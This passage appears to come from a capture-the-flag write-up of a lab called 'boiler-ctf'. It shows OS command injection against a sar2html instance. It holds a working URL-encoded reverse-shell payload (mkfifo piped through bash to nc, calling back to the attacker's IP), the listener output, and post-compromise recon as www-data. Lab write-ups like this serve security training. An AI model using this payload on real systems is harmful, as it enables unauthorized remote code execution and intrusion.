OS Command Injection
A vulnerable instance of sar2html has been identified, suffering from a Remote Code Execution vulnerability.
┌──(kali㉿kali)-[~/archive/thm/boiler-ctf]
└─$ curl -i 'http://10.10.124.235/joomla/_test/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.9.1.194%209999%20%3E%2Ftmp%2Ff'Sending a URL-Encoded reverse shell command
┌──(kali㉿kali)-[~/archive/thm/boiler-ctf]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.194] from (UNKNOWN) [10.10.124.235] 50462
bash: cannot set terminal process group (1128): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Vulnerable:/var/www/html/joomla/_test$ whoami
www-data
www-data@Vulnerable:/var/www/html/joomla/_test$ hostname
Vulnerable
www-data@Vulnerable:/var/www/html/joomla/_test$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:74:6d:86:fb:87 brd ff:ff:ff:ff:ff:ff
inet 10.10.124.235/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::74:6dff:fe86:fb87/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via OS command injection